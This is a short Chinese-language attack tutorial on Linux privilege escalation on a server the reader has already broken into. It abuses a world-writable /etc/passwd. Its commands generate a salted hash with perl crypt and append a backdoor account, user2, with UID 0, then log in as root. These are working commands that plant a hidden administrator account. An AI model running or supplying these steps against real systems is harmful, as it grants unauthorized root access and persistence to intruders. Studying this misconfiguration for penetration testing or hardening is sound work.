当我们拿到一个服务器之后,发现得到的权限是一个低权限的账号,这是我们为了得到更多的信息,就需要对权限做一个提升。
利用/etc/passwd 提权的前提条件是拥有写的权限,有时候有些运维人员大意导致其他设置权限时导致/etc/passwd拥有写的权限
假如我们拿下了一个服务器,发现他的etc/passwd拥有其他用户写的权限
此时我们可以通过编辑etc/passwd来添加用户。我们指定一个用户,在密码占位符后指定密码,并将uid设置为0。并将其添加到/etc/passwd中
首先,使用perl语言生成带有盐值的密码,此地的123456便是我们要加盐的密码
perl -le 'print crypt("123456","addedsalt")'
然后将有需要的用户user2添加到/etc/passwd中
echo "user2:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
我们查看一下/etc/passwd文件,发现我们添加的用户已经写入
我们尝试进行登录用户user2,密码是我们设置的123456,发现我们创建的用户user2,是以root的权限在登录